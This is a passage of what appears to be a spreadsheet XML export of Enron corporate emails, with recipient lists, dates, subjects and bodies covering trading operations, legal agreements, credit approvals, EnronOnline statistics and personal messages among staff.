'/o=enron/ou=na/cn=recipients/cn=notesaddr/cn=a478079f-55e1f3b0-862566fa-612229@enron.com', 'amie.ha@enron.com', 'corry.bentley@enron.com', 'andy.pace@enron.com', 'mauricio.marquez@enron.com', 'richard.broussard@enron.com', 'ramanarao.tamma@enron.com', 'rika.imai@enron.com', 'jason.kaniss@enron.com', 'erik.simpson@enron.com', 'angie.collins@enron.com', 'chaun.roberts@enron.com', 'kevin.cline@enron.com', 'paul.schiavone@enron.com', 'juan.padron@enron.com', 'ted.ballinger@enron.com', 'kayne.coulter@enron.com', 'ashish.mahajan@enron.com', 'jason.choate@enron.com', 'todd.decook@enron.com', 'tom.may@enron.com', 'm..presto@enron.com', 'd..baughman@enron.com', 'steve.olinde@enron.com', 'mike.carson@enron.com', 'l..garcia@enron.com', 'moises.benchluch@enron.com', 'm..forney@enron.com', 'laurel.bolt@enron.com', 'd..poppa@enron.com', 'robert.stalford@enron.com', 'bryce.schneider@enron.com', 'michael.seely@enron.com', 'doug.sewell@enron.com', 'laura.podurgiel@enron.com', 'clayton.vernon@enron.com', 'jaime.gualy@enron.com', 'gautam.gupta@enron.com', 'joe.stepenovitch@enron.com', 'andy.rodriquez@enron.com', 'gerald.emesih@enron.com', 'judy.martinez@enron.com', 'jay.blaine@enron.com', 'oscar.dalton@enron.com', 'gretchen.lotz@enron.com', 'larry.valderrama@enron.com', 'f..campbell@enron.com', 'matt.lorenz@enron.com', 'dustin.collins@enron.com', 'ryan.williams@enron.com', 'peter.makkai@enron.com', 'carrie.larkworthy@enron.com', 'alan.chen@enron.com', 'juan.hernandez@enron.com', 'david.maskell@enron.com', 'debra.bailey@enron.com', 'mark.symms@enron.com', 'dina.snow@enron.com', 'thomas.lowell@enron.com'})</t>
  </si>
  <si>
    <t>Disaster Recovery Equipment</t>
  </si>
  <si>
    <t>As a reminder...there are several pieces of equipment that are set up on the 30th Floor, as well as on our floor, for the Disaster Recovery Team.  PLEASE DO NOT TAKE, BORROW OR USE this equipment.  Should you need to use another computer system, other than yours, or make conference calls please work with your Assistant to help find or set up equipment for you to use._x000D_
_x000D_
Thanks for your understanding in this matter._x000D_
_x000D_
T.Jae Black_x000D_
East Power Trading_x000D_
Assistant to Kevin Presto_x000D_
off. 713-853-5800_x000D_
fax 713-646-8272_x000D_
cell 713-539-4760</t>
  </si>
  <si>
    <t>Thu, 28 Feb 2002 07:04:18 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'perry.frazier@enron.com', 'esther.dasilva@enron.com', 'sandy.sheffield@enron.com', 'tk.lohman@enron.com', 'lorraine.lindberg@enron.com', 'craig.buehler@enron.com', "paul.y'barbo@enron.com", 'michelle.lokay@enron.com', 'lindy.donoho@enron.com', 'paul.cherry@enron.com', 'mark.mcconnell@enron.com', 'dennis.lee@enron.com'})</t>
  </si>
  <si>
    <t>RE: Credit Request  Reliant Energy Services</t>
  </si>
  <si>
    <t>approved_x000D_
_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Lee, Dennis  _x000D_
Sent:	Thursday, February 28, 2002 8:59 AM_x000D_
To:	Buehler, Craig; Cherry, Paul; Dasilva, Esther; Donoho, Lindy; Frazier, Perry; Lee, Dennis; Lindberg, Lorraine; Lohman, TK; Lokay, Michelle; McConnell, Mark; Sheffield, Sandy; White, Angela; Y'barbo, Paul_x000D_
Subject:	Credit Request  Reliant Energy Services_x000D_
_x000D_
Credit Requested_x000D_
_x000D_
Shipper : 		Reliant Energy Services, Inc.	_x000D_
Contract # :		27496	_x000D_
Service Type :		FT_x000D_
MDQ:			30,000 Dth/d _x000D_
Rate:			$0.10_x000D_
Term:			March 1, 2002 through March 31, 2002_x000D_
_x000D_
_x000D_
Dennis P. Lee_x000D_
ETS_x000D_
Gas Logistics_x000D_
(713) 853-1715_x000D_
dennis.lee@enron.com</t>
  </si>
  <si>
    <t>Fri, 6 Apr 2001 04:46:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Estimated Actuals for April 5, 2001</t>
  </si>
  <si>
    <t xml:space="preserve">ESTIMATED ACTUALS_x000D_
_x000D_
Teco Tap       24.917_x000D_
_x000D_
_x000D_
When we receive actuals from Duke, I will forward them to you._x000D_
</t>
  </si>
  <si>
    <t>Mon, 18 Sep 2000 23:11:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'jacqueline.didier@csfb.com'})</t>
  </si>
  <si>
    <t>Enron - revised draft Futures Customer Agreement</t>
  </si>
  <si>
    <t>[INFO] -- Content Manager:_x000D_
This message is for the named person's use only.  It may contain_x000D_
confidential, proprietary or legally privileged information.  No_x000D_
confidentiality or privilege is waived or lost by any mistransmission._x000D_
If you receive this message in error, please immediately delete it and_x000D_
all_x000D_
copies of it from your system, destroy any hard copies of it and notify_x000D_
the_x000D_
sender.  You must not, directly or indirectly, use, disclose,_x000D_
distribute,_x000D_
print, or copy any part of this message if you are not the intended_x000D_
recipient. CREDIT SUISSE GROUP and each of its subsidiaries each reserve_x000D_
the right to monitor all e-mail communications through its networks._x000D_
Any_x000D_
views expressed in this message are those of the individual sender,_x000D_
except_x000D_
where the message states otherwise and the sender is authorised to state_x000D_
them to be the views of any such entity._x000D_
Unless otherwise stated, any pricing information given in this message_x000D_
is_x000D_
indicative only, is subject to change and does not constitute an offer_x000D_
to_x000D_
deal at any price quoted._x000D_
Any reference to the terms of executed transactions should be treated as_x000D_
preliminary only and subject to our formal written confirmation._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Please note that CSFBC cannot  make certain of the changes requested to the _x000D_
Default/Remedies provision due to  its?position as a futures commission _x000D_
merchant.? I would appreciate it  if you would?phone me to discuss the _x000D_
revised document in the morning so  that we may potentially reach agreement _x000D_
on it by Wednesday, in advance of  Guillaume's visit.? Thanks and I look _x000D_
forward to speaking with you  soon._x000D_
?_x000D_
_x000D_
_x000D_
Jacqueline  Didier _x000D_
Legal and Compliance  Department _x000D_
CREDIT | FIRST _x000D_
SUISSE | BOSTON _x000D_
Phone: 212-325-4129 _x000D_
Fax: 212-325-8282 _x000D_
_x000D_
_x000D_
 - 003680726.DOC_x000D_
 - Didier, Jacqueline.vcf</t>
  </si>
  <si>
    <t>Thu, 26 Oct 2000 04:32:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>ETAs</t>
  </si>
  <si>
    <t xml:space="preserve">----- Forwarded by Tana Jones/HOU/ECT on 10/26/2000 11:32 AM -----_x000D_
_x000D_
	Lisa Lees_x000D_
	10/26/2000 11:29 AM_x000D_
		 _x000D_
		 To: Tana Jones/HOU/ECT@ECT_x000D_
		 cc: _x000D_
		 Subject: ETAs_x000D_
_x000D_
As you can see below, some of the ETAs have been forwarded to Travis.  _x000D_
Apparently, the others reside here, but only Frank knows where they are.  As _x000D_
he's on a plane back to the US right now, I'll have to get these to you guys _x000D_
tomorrow._x000D_
_x000D_
Thanks._x000D_
---------------------- Forwarded by Lisa Lees/HOU/ECT on 10/26/2000 11:21 AM _x000D_
---------------------------_x000D_
   _x000D_
	Enron North America Corp._x000D_
	_x000D_
	From:  Jason Althaus @ ENRON                           10/26/2000 11:09 AM_x000D_
	_x000D_
_x000D_
To: Lisa Lees/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: ETAs_x000D_
_x000D_
FYI_x000D_
---------------------- Forwarded by Jason Althaus/Corp/Enron on 10/26/2000 _x000D_
11:02 AM ---------------------------_x000D_
   Arfan Aziz @ ECT                10/26/2000 11:02 AM_x000D_
_x000D_
To: Travis McCullough/HOU/ECT@ECT_x000D_
cc: Melba Lozano/HOU/ECT@ECT, Jason Althaus/Corp/Enron@Enron, Enron London - _x000D_
EOL Product Control Group/LON/ECT@ECT, Justin Boyd/LON/ECT@ECT _x000D_
_x000D_
Subject: ETAs_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
We do not have Australia, Bermuda, Chile, Japan &amp; Peru - PCG Houston should _x000D_
be able to help with those._x000D_
_x000D_
Thanks_x000D_
_x000D_
Arfan_x000D_
_x000D_
_x000D_
_x000D_
--_x000D_
-------------------- Forwarded by Arfan Aziz/LON/ECT on 26/10/2000 17:01 _x000D_
---------------------------_x000D_
   _x000D_
	Enron Capital &amp; Trade Resources Corp._x000D_
	_x000D_
	From:  Jason Althaus @ ENRON                           26/10/2000 16:56_x000D_
	_x000D_
_x000D_
To: Arfan Aziz/LON/ECT@ECT, Melba Lozano/HOU/ECT@ECT_x000D_
cc:  _x000D_
_x000D_
Subject: ETAs_x000D_
_x000D_
I appreciate your assistance.  Could you please forward these documents to _x000D_
Travis McCullough directly?_x000D_
_x000D_
Thanks,_x000D_
Jason_x000D_
---------------------- Forwarded by Jason Althaus/Corp/Enron on 10/26/2000 _x000D_
10:44 AM ---------------------------_x000D_
To: Jason Althaus/Corp/Enron@Enron_x000D_
cc: Tana Jones/HOU/ECT@ECT _x000D_
_x000D_
Subject: ETAs_x000D_
_x000D_
Jason,_x000D_
_x000D_
As we discussed, please route the message below to the approriate IT person _x000D_
to retrieve the ETAs referenced._x000D_
_x000D_
Thank you._x000D_
---------------------- Forwarded by Lisa Lees/HOU/ECT on 10/26/2000 10:37 AM _x000D_
---------------------------_x000D_
From: Tana Jones on 10/25/2000 03:26 PM_x000D_
To: Lisa Lees/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: ETAs_x000D_
_x000D_
Travis needs to get copies of the ETA's below.  I don't know if there is _x000D_
someone here in Houston that can get them for him, or someone in London.  I _x000D_
usually would have called Edmund on this but he's out sick for awhile.  Can _x000D_
you track it down for us?  Thanks!_x000D_
----- Forwarded by Tana Jones/HOU/ECT on 10/25/2000 03:24 PM -----_x000D_
_x000D_
	Travis McCullough_x000D_
	10/25/2000 02:43 PM_x000D_
		 _x000D_
		 To: Tana Jones/HOU/ECT@ECT_x000D_
		 cc: _x000D_
		 Subject: ETAs_x000D_
_x000D_
Tana -- I need the EnronOnline ETAs (faxes would be OK) for the following _x000D_
countries:_x000D_
_x000D_
Australia_x000D_
Bermuda_x000D_
Chile_x000D_
Croacia_x000D_
Czech Republic_x000D_
Denmark_x000D_
Japan_x000D_
Mexico_x000D_
Norway_x000D_
Peru_x000D_
Poland_x000D_
Romania_x000D_
Slovenia_x000D_
_x000D_
Travis McCullough_x000D_
Enron North America Corp._x000D_
1400 Smith Street EB 3817_x000D_
Houston Texas 77002_x000D_
Phone:  (713) 853-1575_x000D_
Fax: (713) 646-3490      _x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Fri, 3 Nov 2000 05:11:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Legal Representation in Gas Accord II</t>
  </si>
  <si>
    <t>Jeff:_x000D_
_x000D_
Goodin, MacBride is willing and able to represent a coalition of_x000D_
end-users, marketers, and other interested parties in the PG&amp;E Gas Accord II_x000D_
proceeding in much the same fashion that it represented multiple parties in_x000D_
the GRI proceeding in both PG&amp;E and SoCalGas settlements.  We would propose_x000D_
to split our monthly billings for legal fees and expenses equally between_x000D_
the parties who agree to join such a coalition.  In exchange for joining the_x000D_
coalition, parties would receive frequent updates on the status of_x000D_
settlement talks and other proceedings, participate in conference calls to_x000D_
reach decisions on coalition positions, and have the ability to call on the_x000D_
GMSRD lawyers on the case in order to answer specific questions or provide_x000D_
any other useful information._x000D_
_x000D_
I envision using several attorneys for various portions of the_x000D_
proceeding, including using associates and paralegals for research, and_x000D_
other GMSRD partners with gas experience for preparation of pleadings, etc._x000D_
However, most of the face to face negotiating, including working with_x000D_
Commissioners and advisors as necessary, would be done by myself as lead_x000D_
partner on the case.  I have attached a fee schedule for the GMSRD attorneys_x000D_
who would likely have some involvement in the case.  Because the majority of_x000D_
this work will be done in 2001, these rates reflect our new 2001 hourly_x000D_
fees.  However, in an effort to encourage participation in the coalition,_x000D_
and because several potential members of the coalition are past or existing_x000D_
clients, we propose to reduce our standard fees with a 15% discount for all_x000D_
participants in the coalition.  With this discount, these would be the_x000D_
lowest fees available to any of our clients in the coming year._x000D_
_x000D_
I have not made any type of estimate of legal expenses for this_x000D_
proceeding, as it is exceedingly difficult to forecast how protracted the_x000D_
proceedings will be.  Once we begin participating in the proceeding and we_x000D_
collectively decide how best to proceed in terms of actual participation in_x000D_
the case, we can provide frequent budget reports and make more useful_x000D_
budgetary estimates.  If you require some type of estimation sooner than_x000D_
that, please let me know._x000D_
_x000D_
Thank you for your interest in using our services.  Please contact_x000D_
me directly at (415) 765-8408 if you have any questions._x000D_
_x000D_
Mike Day, partner_x000D_
Goodin, MacBride, Squeri, Ritchie &amp; Day_x000D_
_x000D_
_x000D_
_x000D_
GMSRD Fee Schedule for Gas Accord II proceedings_x000D_
_x000D_
Michael Day    $300_x000D_
_x000D_
James McTarnaghan   $260_x000D_
_x000D_
Jeanne Bennett    $220_x000D_
_x000D_
Alexandra Ozols    $130_x000D_
_x000D_
Heather Patrick, paralegal  $ 85</t>
  </si>
  <si>
    <t>Thu, 28 Feb 2002 05:11:38 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'lynn.blair@enron.com', 'rick.dietz@enron.com', 'caroline.barnes@enron.com', 'shelley.corman@enron.com', 'james.saunders@enron.com', 'tracy.geaccone@enron.com', 'e..anderson@enron.com', 'charlie.thompson@enron.com', 'rod.hayslett@enron.com', 'peggy.sims@enron.com'})</t>
  </si>
  <si>
    <t>GMS Weekly Report</t>
  </si>
  <si>
    <t xml:space="preserve">Please see attached_x000D_
Ellils </t>
  </si>
  <si>
    <t>Gait analysis clinic</t>
  </si>
  <si>
    <t>A Peak Performance  employee will conduct a gait analysis clinic on Tuesday, _x000D_
December 5, 2000, 1:30--4:30, in the Fitness Center.  Your gait can be video _x000D_
taped,_x000D_
 while on the treadmill, and  recommendations made for proper shoes.   Shoes _x000D_
and apparel will also be on display from Peak Performance._x000D_
 Runners and walkers are welcome to attend.   For more information, call _x000D_
X7532, the Health Unit._x000D_
Elizabeth Jones</t>
  </si>
  <si>
    <t>Thu, 31 May 2001 08:04:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: Floor Meeting</t>
  </si>
  <si>
    <t xml:space="preserve">Great questions!  It is fine with me if you would like to distribute them.  I _x000D_
may cover some in the floor talk.  Thanks for the help.  Mark_x000D_
_x000D_
_x000D_
_x000D_
	Marcus Nettelton@ENRON_x000D_
	05/31/2001 02:33 PM_x000D_
		 _x000D_
		 To: Mark E Haedicke/HOU/ECT@ECT_x000D_
		 cc: _x000D_
		 Subject: Floor Meeting_x000D_
_x000D_
Mark,_x000D_
 _x000D_
Attached are a few questions that you might like to have asked and have a _x000D_
prepared answer for, to assist in your Floor Meeting._x000D_
 _x000D_
As a suggestion you might want to allocate these questions, or any others to _x000D_
be asked to your direct reports at your regular meeting on Monday and where _x000D_
necessary they can provide you with any particular details to give as full an _x000D_
answer as you would like. Janette could possibly ask question numbered 1._x000D_
 _x000D_
Let me know if there is anything you would like me to do. I will of course be _x000D_
happy to ask any question, provided you have had the opportunity to prepare _x000D_
an answer._x000D_
 _x000D_
Regards,_x000D_
 _x000D_
Marcus_x000D_
_x000D_
_x000D_
1.When will EWS Legal Department be moving to the new building and where will _x000D_
we be located? _x000D_
_x000D_
2.Will all attorneys have an office?_x000D_
_x000D_
3.While we expect all areas of the EWS business to grow, which areas , over _x000D_
the next 6-12 months, do you believe will grow the fastest and require the _x000D_
greatest support from the EWS Legal Department?_x000D_
_x000D_
4.With the bankruptcy of PG&amp;E what were we able to do using our existing _x000D_
contracts to mitigate our exposure?_x000D_
_x000D_
5.Are there any changes that you believe we will need to make to our _x000D_
contracts or any new contracts we will need to consider entering into with _x000D_
counterparties to assist us in managing our risk in the event of future _x000D_
bankruptcies?_x000D_
 _x000D_
6. Are you able to tell us what we estimate financial our exposure is to PG&amp;E _x000D_
as a result of their bankruptcy?_x000D_
_x000D_
7.Why is Enron winding down its power trading operations in Japan?_x000D_
 _x000D_
 _x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Fri, 8 Dec 2000 05:49:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'noose911@earthlink.com', 'ttran20@hotmail.com', 'lxtran@yahoo.com', 'ghorgan@siegfriedgroup.com', 'dcatalina@juniper.com', 'clukawski@hitt-gc.com', 'aa_4@yahoo.com', 'kbrafman@hotmail.com', 'marc.albero@eddy.foamex.com', 'jpenney@hollandlessard.com', 'dmahoney@tularik.com', 'petromega@aol.com', 'wgioffre@aol.com', 'jpgiles@hotmail.com', 'reedbohner@aol.com', 'csdaulat@hotmail.com', 'mikedogum@aol.com', 'lgranozio@aol.com', 'jverre99@hotmail.com', 'hub1dds@aol.com', 'ptrintis@cs.com', 'bwycall@hotmail.com', 'bethh@fast.net', 'ehannum@epix.net', 'dhickey@archmereacademy.com', 'cpatterson@siegfriedgroup.com', 'jbukzin@christianacare.org', 'dtaub1@aol.com', 'longovin@cs.com', 'pvdds@aol.com', 'mgioffre@cassidy.com', 'mageewilliam3@hotmail.com', 'dukern8@gateway.net', 'ksiegfried@siegfriedgroup.com', 'benjamin.rogers@enron.com', 'barbdl3@aol.com', 'bhickey@cmiprint.com', 'sarahg@stephenbradford.com', 'rbeste1301@aol.com', 'sean.healy@thetowndock.com', 'easbda@aol.com', 'scott@calvertschool.org', 'mcatalina@siegfriedgroup.com', 'lgbeachmom@aol.com', 'sjs1516@earthlink.com', 'dgioffre@aol.com'})</t>
  </si>
  <si>
    <t>_______________________________________________________________________________x000D_
________x000D_
Get more from the Web.  FREE MSN Explorer download : http://explorer.msn.com_x000D_
_x000D_
 - Help.jpg</t>
  </si>
  <si>
    <t>Mon, 15 Oct 2001 15:39:24 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'grant.oh@enron.com', 'michael.danielson@enron.com', 'david.cho@enron.com', 'enw &lt;.palmer@enron.com&gt;', 'edward.ondarza@enron.com', 'lindsay.renaud@enron.com', 'james.whitehead@enron.com', 'leonardo.pacheco@enron.com', 'justin.timothy@enron.com', "nicholas.o'day@enron.com", 'justin.rostant@enron.com', 'jez.peters@enron.com', 'dan.dietrich@enron.com', 'rick.buy@enron.com', 'sunil.abraham@enron.com', 'daniel.diamond@enron.com', 'anthony.dayao@enron.com', 'william.abler@enron.com', 'samuel.grossman@enron.com', 'norihito.ikeda@enron.com', 'mitch.olson@enron.com', 'greg.wolfe@enron.com', 'erica.bess@enron.com', 'bob.shults@enron.com', 'jay.webb@enron.com', 'julie.green@enron.com', 'george.mcclellan@enron.com', 'd..gros@enron.com', 'brian.redmond@enron.com', 'jonathan.whitehead@enron.com', 'katrin.haux@enron.com', 'karen.denne@enron.com', 'david.leboe@enron.com', 'sally.beck@enron.com', 'tara.sweitzer@enron.com', 'j..kean@enron.com', 'brad.richter@enron.com', 'molly.hellerman@enron.com', 'kal.shah@enron.com', 'savita.puthigai@enron.com', 'craig.breslau@enron.com', 'david.oxley@enron.com', 'louise.kitchen@enron.com', 'harry.bucalo@enron.com', 'a..gomez@enron.com', 'legal &lt;.taylor@enron.com&gt;', 'tracy.ralston@enron.com', 'jeff.bartlett@enron.com', 'meredith.philipp@enron.com', 'bryan.garrett@enron.com', 'peter.bradley@enron.com', 'jackie.gentle@enron.com', 'george.wasaff@enron.com', 'suryan.wirya@enron.com', 'elizabeth.linnell@enron.com', 'mark.pickering@enron.com', 'remi.collonges@enron.com', 'habiba.ewing@enron.com', 'iona.maclean@enron.com', 'michael.mcdonald@enron.com', 'teresa.mandola@enron.com', 'alex.parsons@enron.com', 'kimberly.friddle@enron.com', 'paula.rieker@enron.com', 'kevin.mcgowan@enron.com', 'allan.sommer@enron.com', 'jeff.gray@enron.com', 'jeannie.mandelker@enron.com', 'carlos.alatorre@enron.com', 'alan.engberg@enron.com', 'mika.watanabe@enron.com', 'carrie.robert@enron.com', 'patrick.hansen@enron.com', 'jay.hawthorn@enron.com', 'd..baughman@enron.com', 'mark.tawney@enron.com', 'bryan.seyfried@enron.com', 'charles.david@enron.com', 'torrey.moorer@enron.com', 'amita.gosalia@enron.com', 'henry.means@enron.com', 'greg.whalley@enron.com', 'tina.spiller@enron.com', 'f..herod@enron.com', 'tammie.schoppe@enron.com', 'fraisy.george@enron.com', 'larry.gagliardi@enron.com', 'stuart.staley@enron.com', 'lisa.lees@enron.com', 'e.bowman@enron.com', 'jeff.kinneman@enron.com', 'cedric.burgher@enron.com', 'heather.alon@enron.com', 'eric.thode@enron.com', 'per.sekse@enron.com', 'mark.frevert@enron.com', 'mark.koenig@enron.com', 'fred.lagrasta@enron.com', 'richard.shapiro@enron.com', 'bryan.deluca@enron.com', 'joseph.hirl@enron.com', 'jennifer.denny@enron.com', 'ricardo.lisboa@enron.com', 'john.ambler@enron.com', 'laura.valencia@enron.com', 'andrew.wilson@enron.com', 'jason.seigal@enron.com', 'john.cummings@enron.com', 'stephanie.miller@enron.com'})</t>
  </si>
  <si>
    <t>EnronOnline Weekly Public Report for October 12, 2001</t>
  </si>
  <si>
    <t xml:space="preserve">The information contained in the Weekly Public Report can be communicated to audiences outside the company and should be used to ensure that we present a consistent message to the public. Please ensure that this email is distributed to anyone in your group who needs to discuss EnronOnline with individuals outside the company._x000D_
_x000D_
This report is not intended to be used as a stand-alone presentation, nor that all the information be used in a single presentation or customer communication._x000D_
_x000D_
Total Life to Date Transactions &gt;1,500,000_x000D_
Average Daily Transactions &gt; 5,450_x000D_
_x000D_
Life to Date Notional Value of Transactions &gt; $850 billion_x000D_
Daily Notional Value Approximately $2.2 billion_x000D_
_x000D_
Number of Products Offered: Approximately 2,000_x000D_
Number of Currencies Traded in = 15_x000D_
_x000D_
EnronOnline Version 1.0 Launch Date: November 29, 1999_x000D_
EnronOnline Version 2.0 Launch Date: September 18, 2000_x000D_
_x000D_
_x000D_
Due to size constraints on the Outlook System, the Public Report will no longer be distributed._x000D_
A complete copy of the report can now be accessed directly through the EnronOnline _x000D_
Intranet Site at http://eolinfo.enron.com._x000D_
_x000D_
In order to access this report,  click on the link above. Once there, follow the link entitled "Reports" and then select the "Public Reports" tab. A dropdown menu will appear with a list of the various public reports available for viewing. ._x000D_
_x000D_
We look forward to your feedback and comments. If you have any questions or experience any difficulties accessing your reports through the Intranet Site, please feel free to contact either Bryan Deluca at x36161 or Fraisy George at x35424._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
 </t>
  </si>
  <si>
    <t>Fri, 1 Dec 2000 08:57:00 -0800 (PST)</t>
  </si>
  <si>
    <t>East Coast Power</t>
  </si>
  <si>
    <t>Attached is a black-lined copy of the Assignment and Assumption Agreement._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Angela D. Davis_x000D_
Enron North America Corp._x000D_
1400 Smith, Suite 3842_x000D_
Houston, Texas 77002_x000D_
Tele. (713) 345-8347_x000D_
Fax:  (713) 646-3393_x000D_
e-mail:  angela.davis@enron.com</t>
  </si>
  <si>
    <t>Mon, 4 Feb 2002 08:08:22 -0800 (PST)</t>
  </si>
  <si>
    <t>Yes.  I can go to lunch today.  I'll meet you at the entrance of the cafeteria.  When?_x000D_
Also, take Rosemary a check on Sat. made out to March of Dimes._x000D_
_x000D_
-----Original Message-----_x000D_
From: Corman, Shelley _x000D_
Sent: Monday, February 04, 2002 10:05 AM_x000D_
To: Nicolay, Christi L._x000D_
Subject: Re: _x000D_
_x000D_
_x000D_
Okay I'll go for a ticket._x000D_
_x000D_
Are you back in town.  Do you want to go to the cafeteria for lunch._x000D_
--------------------------_x000D_
Sent from my BlackBerry Wireless Handheld (www.BlackBerry.net)</t>
  </si>
  <si>
    <t>Wed, 12 Apr 2000 02:32:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'nicholas.stephan@enron.com', 'sunil.dalal@enron.com', 'benjamin.freeman@enron.com'})</t>
  </si>
  <si>
    <t>Raindrops keep falling on my head...</t>
  </si>
  <si>
    <t>Given that tonight's weather conditions may not permit dining alfresco, I was _x000D_
wondering if we should come up with an alternative plan.  I think the first _x000D_
order of business is whether or not we want to go some place we can eat or if _x000D_
everyone just wants to meet up post dinner.  Depending on everyone's _x000D_
preferences I have several suggestions.  Let me know your thoughts (regarding _x000D_
tonight).</t>
  </si>
  <si>
    <t>Fri, 9 Jun 2000 09:00:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'rkampmann@aol.com'})</t>
  </si>
  <si>
    <t>Please send me a few recommended B&amp;Bs and restaurants.  Thanks for your help._x000D_
_x000D_
Kevin_x000D_
_x000D_
My email at home is kruscitti@aol.com (I think).</t>
  </si>
  <si>
    <t>frozenset({'eddy.daniels@enron.com'})</t>
  </si>
  <si>
    <t>Re: Rescheduled - Quarterly Legal Review for South America</t>
  </si>
  <si>
    <t xml:space="preserve">Sorry.  My schedule does not permit that change.  Mark_x000D_
_x000D_
_x000D_
_x000D_
	Eddy Daniels@ENRON_x000D_
	03/29/2001 02:07 PM_x000D_
		_x000D_
		 To: Mark E Haedicke/HOU/ECT@ECT, Janette Elbertson/HOU/ECT@ECT_x000D_
		 cc: John Novak/SA/Enron@Enron, Lance Schuler-Legal/HOU/ECT@ECT, Sami _x000D_
Arap/SA/Enron@Enron_x000D_
		 Subject: Re: Rescheduled - Quarterly Legal Review for South America_x000D_
_x000D_
I am scheduled to be in New Orleans all day at a conference Tuesday, May 1, _x000D_
and was planning on traveling directly to San Antonio on Weds.  Any chance we _x000D_
could have the ESA QLR in San Antonio either Weds. before dinner or before _x000D_
departing from SA on Friday??_x000D_
</t>
  </si>
  <si>
    <t>Wed, 30 Jan 2002 14:30:52 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'m..love@enron.com', 'russell.diamond@enron.com', 'm.hall@enron.com', 'scott.palmer@enron.com', 's..theriot@enron.com', 'stacey.richardson@enron.com', 'c..gossett@enron.com', 't..hodge@enron.com', 'c..giron@enron.com'})</t>
  </si>
  <si>
    <t>Additional deals to move to Bankruptcy Books - Phy Gas</t>
  </si>
  <si>
    <t xml:space="preserve">Attached are some additional phy gas deals that need to be moved over to the bankruptcy books._x000D_
_x000D_
Thank you!_x000D_
Cyndie_x000D_
_x000D_
 </t>
  </si>
  <si>
    <t>Mon, 29 Oct 2001 08:49:39 -0800 (PST)</t>
  </si>
  <si>
    <t>PGE Imbalance Charge</t>
  </si>
  <si>
    <t>Christi --_x000D_
_x000D_
What's the latest on the PGE imbalance method??_x000D_
_x000D_
Jim</t>
  </si>
  <si>
    <t>Thu, 22 Mar 2001 07:35:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Team 3</t>
  </si>
  <si>
    <t>Ken,_x000D_
_x000D_
It seems that there may be an Internet bias as well (more affluent _x000D_
and educated households are on-line)._x000D_
_x000D_
One solution: develop a control group. Arm-twist clerical _x000D_
employees of the School to fill out the questionnaire_x000D_
and also ask them to provide the questionnaire to their friends  and families._x000D_
_x000D_
Vince</t>
  </si>
  <si>
    <t>Mon, 26 Nov 2001 11:27:24 -0800 (PST)</t>
  </si>
  <si>
    <t>sorry that conversation was depressing me</t>
  </si>
  <si>
    <t>Tue, 10 Oct 2000 02:39:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Michaelisms</t>
  </si>
  <si>
    <t xml:space="preserve">---------------------- Forwarded by Kay Mann/Corp/Enron on 10/10/2000 09:39 _x000D_
AM ---------------------------_x000D_
   _x000D_
	Enron North America Corp._x000D_
	_x000D_
	From:  Kay Mann                           10/10/2000 09:38 AM_x000D_
	_x000D_
_x000D_
To: cbrashear@ve.com_x000D_
cc:  _x000D_
_x000D_
Subject: Michaelisms_x000D_
_x000D_
Michael has been peppering me with questions lately:_x000D_
_x000D_
Do you have to be rich to run for president?_x000D_
Do you have to follow in your father's footsteps when you grow up?_x000D_
How would it be if I kicked the ball through the clouds and God caught it?_x000D_
Can you see God?_x000D_
Where is God?_x000D_
Why did Dolly die (pathology, not philosophy)?  Was it fleas and worms?_x000D_
_x000D_
And when he was  mad at Neil:  Mom, you picked the wrong husband._x000D_
_x000D_
I'm sure there have been more - this was just Sunday and Monday!_x000D_
_x000D_
Kay_x000D_
</t>
  </si>
  <si>
    <t>Thu, 17 Aug 2000 06:38:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Phone Call</t>
  </si>
  <si>
    <t xml:space="preserve">Sorry that I missed you this morning.  I attended that last Financial Council _x000D_
meeting on SAP this morning just prior to my lunch meeting with Mark Frevert _x000D_
and Rick Causey.  Nothing substantial came up on Helsinki, so it was fine _x000D_
that we didn't get to talk today.  I had wanted to be prepared on how to _x000D_
address out current activities there.  So I can get an update on that when we _x000D_
talk tomorrow._x000D_
_x000D_
I have a meeting on the analyst and associates program from 9:00 to 10:00 _x000D_
tomorrow.   I will call you around 10:00 when I get back from that meeting.  </t>
  </si>
  <si>
    <t>Mon, 4 Dec 2000 00:38:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'pearce.hammond@enron.com', 'jim.meyn@enron.com', 'jim.homco@enron.com', 'robin.barbe@enron.com', 'paul.broderick@enron.com', 'john.griffith@enron.com', 'mark.davis@enron.com', 'edward.baughman@enron.com', 'kevin.presto@enron.com'})</t>
  </si>
  <si>
    <t>Pepperell tolling deal executed</t>
  </si>
  <si>
    <t xml:space="preserve">All:_x000D_
_x000D_
At long last, we have executed the Pepperell tolling deal, which commences _x000D_
Jan 1, 2001.  Attached is the final confirm for the deal.   I will be _x000D_
scheduling a plant tour and meeting with the appropriate folks to pin down _x000D_
logistics and communication protocols.     Please give me a call if you'd _x000D_
like to discuss.  Thanks_x000D_
_x000D_
John_x000D_
</t>
  </si>
  <si>
